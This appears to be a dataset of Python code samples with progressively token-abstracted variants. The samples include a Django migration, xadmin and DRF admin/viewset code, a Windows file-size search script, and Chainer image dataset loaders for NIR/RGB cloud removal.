"<import token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('users', '0002_employee')]\n operations = [migrations.CreateModel(name='Client', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Criado em')), ('modified', models.\n DateTimeField(auto_now=True, verbose_name='Modificado em')), (\n 'name', models.CharField(max_length=255, verbose_name='Nome')), (\n 'cpf', models.CharField(max_length=16, verbose_name='CPF')), ('rg',\n models.CharField(max_length=16, verbose_name='RG')), ('address',\n models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name=\n 'Celular')), ('phone', models.TextField(blank=True, null=True,\n verbose_name='Telefone')), ('employee', models.ForeignKey(on_delete\n =django.db.models.deletion.DO_NOTHING, to='users.Employee',\n verbose_name='Vendedora'))], options={'ordering': ['name', 'cpf']})]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,890 | 08e3a07a2d7f1a2e34dd6a2181b877da1633f5f0 | import xadmin
from .models import Blog,Topic,CollectBookMark
class TopicXadmin(object):
'''这是主题的管理类'''
list_display=['owner','topic_name','is_default','is_delete','addtime']
class BlogXadmin(object):
'''这是博客的管理类'''
list_display=['author','blog_title','category','blog_topic','is_delete','click_num','thumb_num','comment_num','addtime']
class CollectBookMarkXadmin(object):
'''这是收藏夹的管理类'''
list_display=['owner','bookmark_name','is_default','is_delete','addtime']
#注册
xadmin.site.register(Topic,TopicXadmin)
xadmin.site.register(Blog,BlogXadmin)
xadmin.site.register(CollectBookMark,CollectBookMarkXadmin)
| [
"import xadmin\r\nfrom .models import Blog,Topic,CollectBookMark\r\n\r\nclass TopicXadmin(object):\r\n '''这是主题的管理类'''\r\n list_display=['owner','topic_name','is_default','is_delete','addtime']\r\n\r\nclass BlogXadmin(object):\r\n '''这是博客的管理类'''\r\n list_display=['author','blog_title','category','blog_topic','is_delete','click_num','thumb_num','comment_num','addtime']\r\n\r\nclass CollectBookMarkXadmin(object):\r\n '''这是收藏夹的管理类'''\r\n list_display=['owner','bookmark_name','is_default','is_delete','addtime']\r\n\r\n#注册\r\nxadmin.site.register(Topic,TopicXadmin)\r\nxadmin.site.register(Blog,BlogXadmin)\r\nxadmin.site.register(CollectBookMark,CollectBookMarkXadmin)\r\n",
"import xadmin\nfrom .models import Blog, Topic, CollectBookMark\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\nxadmin.site.register(Topic, TopicXadmin)\nxadmin.site.register(Blog, BlogXadmin)\nxadmin.site.register(CollectBookMark, CollectBookMarkXadmin)\n",
"<import token>\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\nxadmin.site.register(Topic, TopicXadmin)\nxadmin.site.register(Blog, BlogXadmin)\nxadmin.site.register(CollectBookMark, CollectBookMarkXadmin)\n",
"<import token>\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n\n\nclass TopicXadmin(object):\n <docstring token>\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n\n\nclass TopicXadmin(object):\n <docstring token>\n <assignment token>\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n <docstring token>\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n <docstring token>\n <assignment token>\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n <docstring token>\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n <docstring token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<code token>\n"
] | false |
99,891 | e2de2cf258ca722c534d93fab1e0ad7fa6f23d9a | #from django_filters.rest_framework import DjangoFilterBackend ; Caso queira que apenas as aplicações selecionadas possuam esse tipo de filtro.
from rest_framework.viewsets import ModelViewSet
from atracoes.models import Atracao
from .serializers import AtracaoSerializer
class AtracaoViewSet(ModelViewSet):
queryset = Atracao.objects.all()
serializer_class = AtracaoSerializer
#filter_backends = (DjangoFilterBackend,)
filter_fileds = ['name','description','min_age'] | [
"#from django_filters.rest_framework import DjangoFilterBackend ; Caso queira que apenas as aplicações selecionadas possuam esse tipo de filtro.\nfrom rest_framework.viewsets import ModelViewSet\nfrom atracoes.models import Atracao\nfrom .serializers import AtracaoSerializer\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n #filter_backends = (DjangoFilterBackend,)\n filter_fileds = ['name','description','min_age']",
"from rest_framework.viewsets import ModelViewSet\nfrom atracoes.models import Atracao\nfrom .serializers import AtracaoSerializer\n\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n filter_fileds = ['name', 'description', 'min_age']\n",
"<import token>\n\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n filter_fileds = ['name', 'description', 'min_age']\n",
"<import token>\n\n\nclass AtracaoViewSet(ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,892 | 7522d7ca8d17c717918ed406e8ca9898ab7c786c | """
3. Implementiere einen Suchmodus für Dateigrößen.
-> Gesucht wird eine Datei mit 3010349 Byte
"""
import os
output = open('output7.txt', 'w', encoding='utf-8')
for var_root, var_dirs, var_files in os.walk('c:\\', topdown=False):
for var_name in var_files:
if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:
print(os.path.join(var_root, var_name), file=output)
output.close() | [
"\"\"\"\n3. Implementiere einen Suchmodus für Dateigrößen.\n-> Gesucht wird eine Datei mit 3010349 Byte\n\"\"\"\nimport os\n\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()",
"<docstring token>\nimport os\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\n<assignment token>\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
99,893 | eb4a1a09cead833c07869020bc40b0c9be4704ed | import os
import sys
import numpy as np
import cv2
import random
import glob
import chainer
def read_imlist(root_dir, txt_imlist):
with open(txt_imlist, 'r') as f:
ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]
return ret
def train_test_dataset(train_class_name, args_train, test_class_name, args_test):
mod_name = os.path.splitext(os.path.basename(__file__))[0]
mod_path = os.path.dirname(__file__)
sys.path.insert(0, mod_path)
train_class = getattr(__import__(mod_name), train_class_name)
test_class = getattr(__import__(mod_name), test_class_name)
train = train_class(**args_train)
test = test_class(**args_test)
return train, test
class TestNIRRGB(chainer.dataset.DatasetMixin):
def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)
nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.
return nirrgb,
class TestNIR(chainer.dataset.DatasetMixin):
def __init__(self, dir_nir, imlist_nir):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
def __len__(self):
return len(self.nir)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
nir = nir[None, :, :] / 127.5 - 1.
return nir,
class TestRGB(chainer.dataset.DatasetMixin):
def __init__(self, dir_rgb, imlist_rgb):
super().__init__()
self.rgb = read_imlist(dir_rgb, imlist_rgb)
def __len__(self):
return len(self.rgb)
def get_example(self, i):
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.
return rgb,
class BaseTrain(chainer.dataset.DatasetMixin):
def __init__(self):
super().__init__()
def transform(self, x, y):
c, h, w = x.shape
if self.augmentation:
top = random.randint(0, h - self.size - 1)
left = random.randint(0, w - self.size - 1)
if random.randint(0, 1):
x = x[:, :, ::-1]
y = y[:, :, ::-1]
else:
top = (h - self.size) // 2
left = (w - self.size) // 2
bottom = top + self.size
right = left + self.size
x = x[:, top:bottom, left:right]
y = y[:, top:bottom, left:right]
return x, y
class NIRRGB2RGBCLOUD(BaseTrain):
def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb, *args, **kwargs):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)
alpha = cloud[:, :, 3] / 255.
alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))
clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]
clouded_rgb = np.clip(clouded_rgb, 0., 255.)
nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)
cloud = cloud[:, :, 3]
rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)
nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.
rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.
nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)
return nirrgb, rgbcloud
class RGB2RGBCLOUD(BaseTrain):
def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):
super().__init__()
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)
alpha = cloud[:, :, 3] / 255.
alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))
clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]
clouded_rgb = np.clip(clouded_rgb, 0., 255.)
cloud = cloud[:, :, 3]
rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)
rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.
rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.
rgb, rgbcloud = self.transform(rgb, rgbcloud)
return rgb, rgbcloud
class NIR2RGB(BaseTrain):
def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **kwargs):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
nir = nir[None, :, :] / 127.5 - 1.
rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.
nir, rgb = self.transform(nir, rgb)
return nir, rgb
| [
"import os\nimport sys\nimport numpy as np\nimport cv2\nimport random\nimport glob\n\nimport chainer\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.\n\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.\n\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.\n\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n\n alpha = cloud[:, :, 3] / 255.\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0., 255.)\n\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.\n\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n\n alpha = cloud[:, :, 3] / 255.\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0., 255.)\n\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.\n\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n\n nir = nir[None, :, :] / 127.5 - 1.\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.\n\n nir, rgb = self.transform(nir, rgb)\n\n return nir, rgb\n",
"import os\nimport sys\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport chainer\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 